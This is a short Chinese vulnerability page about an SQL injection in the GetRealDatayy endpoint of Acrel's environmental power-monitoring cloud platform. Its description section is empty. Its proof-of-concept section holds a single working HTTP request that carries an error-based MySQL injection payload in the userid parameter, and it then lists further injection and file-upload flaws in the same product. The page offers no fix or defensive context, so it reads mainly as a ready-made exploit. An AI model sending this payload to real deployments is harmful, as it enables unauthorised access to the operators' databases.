安科瑞环保用电监管云平台 GetRealDatayy 存在SQL注入

漏洞描述

PoC代码

GET /MainMonitor/GetRealDatayy?userid='%20AND%20GTID_SUBSET(CONCAT(0x7162717071,(SELECT%20(ELT(4889=4889,1))),0x7171786b71),4889)--%20hnzj HTTP/1.1

相关漏洞推荐

• 安科瑞环保用电监管云平台 GetDates SQL注入漏洞
• 安科瑞环保用电监管云平台 uploadAttachment 任意文件上传漏洞
• 安科瑞环保用电监管云平台 GetUserinfoDatayy 存在SQL注入
• 安科瑞环保用电监管云平台 ReflashMap 存在SQL注入
• 安科瑞环保用电监管云平台 /MainMonitor/GetEnterpriseInfoY SQL 注入漏洞
• 安科瑞环保用电监管云平台 GetEnterpriseInfoY SQL注入